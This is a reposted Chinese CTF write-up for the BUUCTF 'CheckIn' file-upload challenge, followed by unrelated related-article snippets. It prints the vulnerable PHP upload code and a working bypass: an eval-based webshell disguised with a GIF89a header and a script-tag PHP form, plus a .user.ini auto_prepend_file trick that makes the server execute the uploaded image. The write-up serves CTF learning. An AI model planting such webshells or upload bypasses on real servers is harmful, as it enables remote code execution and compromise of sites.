BUUCTF-web刷題篇(19)

28.CheckIn

源碼:

#index.php
<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Upload Labs</title>
</head><body><h2>Upload Labs</h2><form action="index.php" method="post" enctype="multipart/form-data"><label for="file">文件名:</label><input type="file" name="fileUpload" id="file"><br><input type="submit" name="upload" value="提交"></form>
</body></html><?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {$tmp_name = $_FILES["fileUpload"]["tmp_name"];$name = $_FILES["fileUpload"]["name"];if (!$tmp_name) {die("filesize too big!");}if (!$name) {die("filename cannot be empty!");}$extension = substr($name, strrpos($name, ".") + 1);if (preg_match("/ph|htacess/i", $extension)) {die("illegal suffix!");}if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {die("&lt;? in contents!");}$image_type = exif_imagetype($tmp_name);if (!$image_type) {die("exif_imagetype:not image!");}$upload_file_path = $userdir . "/" . $name;move_uploaded_file($tmp_name, $upload_file_path);echo "Your dir " . $userdir. ' <br>';echo 'Your files : <br>';var_dump(scandir($userdir));
}

可以看出文件上傳類的題目,繞過后綴的文件格式有php,php3,php4,php5,phtml,pht。

構造木馬文件<?php @eval($_REQUEST['shell']);?>命名為flag.php

上傳木馬文件,顯示illegal suffix!非法后綴,將flag.php改為flag.jpg,繼續上傳木馬文件,顯示<?in vontents!存在違法內容"<?"

改變思路點,將PHP一句話轉換為JS形式

重構木馬文件

<script language="php">@eval($_REQUEST['shell']);</script>

繼續上傳

顯示exif_imagetype:not image!

重構

GIF89a<script language="php">@eval($_REQUEST['shell']);</script>

上傳成功,使用蟻劍測試連接,可以連接,但是返回數據是空的,猜測后臺并沒有解析PHP代碼。訪問題目源碼,提示是.user.ini配置文件。

.user.ini配置文件與.htaccess配置文件比較類似,概述來說,htaccess文件是Apache服務器中的一個配置文件,注意這幾個字“改變文件擴展名”。

.htaccess配置文件格式

<FileMatch "1.jpg>

SetHandler application/x-httpd-php

.user.ini配置文件和.htaccess配置文件都是為了解析PHP代碼

可以把.user.ini理解為用戶可自定義的php.ini配置文件,.user.ini的兩個配置項,auto_prepend_file是在文件前插入,auto_append_file是在文件最后才插入。

創建.user.ini文件

GIF89a
auto_prepend_file=flag.jpg

上傳.user.ini文件

連接蟻劍:密碼:shell

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/76204.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/76204.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/76204.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

如何在Android系統上單編ko?

文章目錄 一、先了解編譯驅動需要什么&#xff1f;二、配置makefile1、在Android系統編譯LOG上找到編譯器信息&#xff08;一般都會打印出來&#xff09;2、基于源MK構造 可獨立運行的makefile3&#xff09;進入docker&#xff0c;在此makefile目錄下敲make4&#xff09;最后根…

【Pandas】pandas DataFrame to_numpy

Pandas2.2 DataFrame Conversion 方法描述DataFrame.astype(dtype[, copy, errors])用于將 DataFrame 中的數據轉換為指定的數據類型DataFrame.convert_dtypes([infer_objects, …])用于將 DataFrame 中的數據類型轉換為更合適的類型DataFrame.infer_objects([copy])用于嘗試…

2025常用的ETL 產品推薦:助力企業激活數據價值

在當今數字化時代&#xff0c;企業面臨著海量數據的挑戰與機遇&#xff0c;ETL&#xff08;Extract, Transform, Load&#xff09;工具作為數據整合與分析的關鍵環節&#xff0c;其重要性日益凸顯。ETL 廠商眾多&#xff0c;各有優勢&#xff0c;本文將從多個維度進行分析&…

LeetCode算法題(Go語言實現)_37

題目 給你一棵以 root 為根的二叉樹&#xff0c;二叉樹中的交錯路徑定義如下&#xff1a; 選擇二叉樹中 任意 節點和一個方向&#xff08;左或者右&#xff09;。 如果前進方向為右&#xff0c;那么移動到當前節點的的右子節點&#xff0c;否則移動到它的左子節點。 改變前進方…

博途 TIA Portal之1200做從站與匯川EASY的TCP通訊

上篇我們寫到了博途做主站與匯川EASY的通訊。通訊操作起來很簡單,當然所謂的簡單,也是相對的,如果操作成功一次,那么后面就很容易了, 如果操作不成功,就會很遭心。本篇我們將1200做從站,與匯川EASY做主站進行TCP的通訊。 1、硬件準備 1200PLC一臺,帶調試助手的PC機一…

Mysql(繼續更新)

INnoDB 三特性 事務 外鍵 行級鎖(開啟事務時,查詢后加FOR UPDATE) MySQL 使用 InnoDB&#xff0c;在 默認隔離級別 —— REPEATABLE READ&#xff08;可重復讀&#xff09; 下 開啟事務&#xff0c;執行 UPDATE 時默認會加行鎖 只要事務沒有提交 這條數據會鎖住 …

[IOI 1994] 數字三角形 Number Triangles

題目鏈接 思路&#xff08;上到下&#xff09;&#xff1a; ①從上往下遞推&#xff1a; f[i][j] max(f[i-1][j] g[i][j], f[i-1][j-1]g[i][j]) ②對最后一層&#xff0c;遍歷一下&#xff0c;找到最大的答案。 代碼&#xff08;上到下&#xff09;&#xff1a; #inclu…

基于Qt的串口通信工具

程序介紹 該程序是一個基于Qt的串口通信工具&#xff0c;專用于ESP8266 WiFi模塊的AT指令配置與調試。主要功能包括&#xff1a; 1. 核心功能 串口通信&#xff1a;支持串口開關、參數配置&#xff08;波特率、數據位、停止位、校驗位&#xff09;及數據收發。 AT指令操作&a…

第5篇:Linux程序訪問控制FPGA端LEDR<三>

Q&#xff1a;如何具體設計.c程序代碼訪問控制FPGA端外設&#xff1f; A&#xff1a;以控制DE1-SoC開發板的LEDR為例的Linux .C程序代碼。頭文件fcntl.h和sys/mman.h用于使用/dev/mem文件&#xff0c;以及mmap和munmap內核函數&#xff1b;address_map_arm.h指定了DE1-SoC_Com…

【學生管理系統升級版】

學生管理系統升級版 需求分析&#xff1a;注冊功能:登錄功能&#xff1a;驗證碼規則&#xff1a;忘記密碼&#xff1a; 實操&#xff1a;系統主頁面注冊功能登錄功能忘記密碼效果演示 需求 為學生管理系統書寫一個登陸、注冊、忘記密碼的功能。 ? ? 只有用戶登錄成功之后&…

CSS Grid布局:從入門到放棄再到真香

Flexbox 與 Grid 布局&#xff1a;基礎概念與特點 Flexbox Flexbox&#xff08;Flexible Box Layout&#xff09;&#xff0c;即彈性盒布局模型&#xff0c;主要用于創建一維布局&#xff0c;能夠輕松實現元素在一行或一列中的排列、對齊與分布。通過display: flex屬性啟用 Fl…

C++怎么調用類中的函數

1. 棧上對象 調用普通成員方法 普通成員方法需要通過類的對象實例&#xff08;或指針、引用&#xff09;來調用。 示例&#xff1a; class MyClass { public:void normalMethod() {std::cout << "普通成員方法被調用" << std::endl;} };int main() {M…

go游戲后端開發31:麻將游戲的碰牌與胡牌邏輯

以下是潤色后的版本&#xff1a; 1. 碰牌邏輯 1.1 觸發碰牌 當一個玩家棄牌后&#xff0c;其他玩家可以選擇碰牌。如果當前玩家決定碰牌&#xff0c;系統需要通知所有玩家這一操作。碰牌操作完成后&#xff0c;當前玩家需要出一張牌&#xff0c;系統同樣需要通知所有玩家。 …

十分鐘機器學習之--------------線性回歸

線性回歸&#xff08;linear regression&#xff09;是一種基于數學模型的算法&#xff0c;首先假設數據集與標簽之間存在線性關系&#xff0c;然后簡歷線性模型求解參數。在實際生活中&#xff0c;線性回歸算法因為其簡單容易計算&#xff0c;在統計學經濟學等領域都有廣泛的應…

學透Spring Boot — 017. 處理靜態文件

這是我的《學透Spring Boot》專欄的第17篇文章&#xff0c;了解更多內容請移步我的專欄&#xff1a; Postnull CSDN 學透 Spring Boot 目錄 靜態文件 靜態文件的默認位置 通過配置文件配置路徑 通過代碼配置路徑 靜態文件的自動配置 總結 靜態文件 以前的傳統MVC的項目…

深入理解 JavaScript 數組查找:如何高效獲取特定元素

深入理解 JavaScript 數組查找&#xff1a;如何高效獲取特定元素 深入理解 JavaScript 數組查找&#xff1a;如何高效獲取特定元素引言問題場景解決方案1. 使用 Array.prototype.find()2. 處理 Proxy 對象的情況3. 備選方案&#xff1a;Array.prototype.filter()4. 傳統 for 循…

HTML5+CSS3小實例:純CSS繪制七巧板

實例:純CSS繪制七巧板 技術棧:HTML+CSS 效果: 源碼: 【HTML】 <!DOCTYPE html> <html lang="zh-CN"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale…

[electron]自動注冊IPC的解決方案

前言 主進程和渲染進程通過IPC進行通信&#xff0c;每次需要定義名稱并注冊&#xff0c;很多代碼都是重復書寫&#xff0c;并且如果主進程和渲染進程開發人員是同一個的話&#xff0c;很多東西都可以簡化。 渲染進程通過ipcRenderer.invoke與主進程通信&#xff0c;主進程通過i…

JS—防抖和節流:1分鐘掌握防抖和節流

個人博客&#xff1a;haichenyi.com。感謝關注 一. 目錄 一–目錄二–防抖三–節流四–進階應用五–總結 二. 防抖&#xff08;Debounce&#xff09; 防抖&#xff08;Debebounce&#xff09;和節流&#xff08;Throttle&#xff09;都是前端開發中用于優化高頻事件性能的兩…

測試模板1

本篇技術博文摘要 &#x1f31f; 引言 &#x1f4d8; 在這個變幻莫測、快速發展的技術時代&#xff0c;與時俱進是每個IT工程師的必修課。我是盛透側視攻城獅&#xff0c;一名什么都會一丟丟的網絡安全工程師&#xff0c;也是眾多技術社區的活躍成員以及多家大廠官方認可人員&a…